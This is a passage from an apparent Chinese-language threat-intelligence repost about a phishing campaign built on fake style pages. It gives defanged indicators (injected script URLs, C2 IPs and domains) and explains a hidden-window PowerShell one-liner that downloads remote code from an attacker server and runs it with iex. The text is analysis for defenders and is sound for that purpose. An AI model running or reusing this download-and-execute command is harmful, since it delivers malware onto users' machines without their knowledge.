hxxps[:]//lancasternh[.]com/6t7y.jshxxps[:]//lancasternh[.]com/js.php?device=windows&ip=[base64 text]&refferer=[base64 text]&browser=[base64 text]&ua=[base64 text]&domain=[base64 text]&loc=[base64 text]&is_ajax=1
powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow;$y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds;$w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"
powershell -w h -c 部分中,-w h 参数使得 PowerShell 以隐藏窗口的方式运行,这样用户难以察觉脚本正在执行,增加了其隐蔽性,避免引起用户的警觉。$z = [datetime]::UtcNow),并与 1970 年 1 月 1 日($y = ([datetime]('01/01/' + '1970')),即 Unix 时间戳的起始时间)计算时间差,再对时间差进行一系列数学运算(向下取整、调整为能被 16 整除等操作),最终构建出一个数值([int64]$v)。这些操作看似复杂,实际是为了生成一个动态的参数,用于后续从远程服务器请求数据的路径中,增加请求的不确定性和隐蔽性。irm 138.199.156[.]22:8080/... 使用 Invoke-WebRequest 从指定的 IP 地址(138.199.156.22)的 8080 端口获取数据,获取的路径包含前面计算生成的参数。然后 iex(Invoke-Expression) 会执行获取到的数据内容。这意味着脚本会从远程服务器下载一段代码,并在本地的 PowerShell 环境中运行。
- 138.199.156[.]22:8080 - 138.199.156[.]22:8080 - GET /1743783280- 138.199.156[.]22:8080 - 138.199.156[.]22:8080 - POST /1743783296- 185.250.151[.]155:80 - ecduutcykpvkbim[.]top - GET /1.php?s=527- 185.250.151[.]155:80 - bfidmcjejlilflg[.]top - GET /z8v7ymbcinhtr.php?id=[hostname]&key=[11-digit number]&s=527
173.232.146[.]62:25658 - 8qvihxy8x5nyixj[.]top - TLSv1.0 HTTPS traffic原文始发于微信公众号(Khan安全团队):钓鱼攻击:假冒样式页面
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论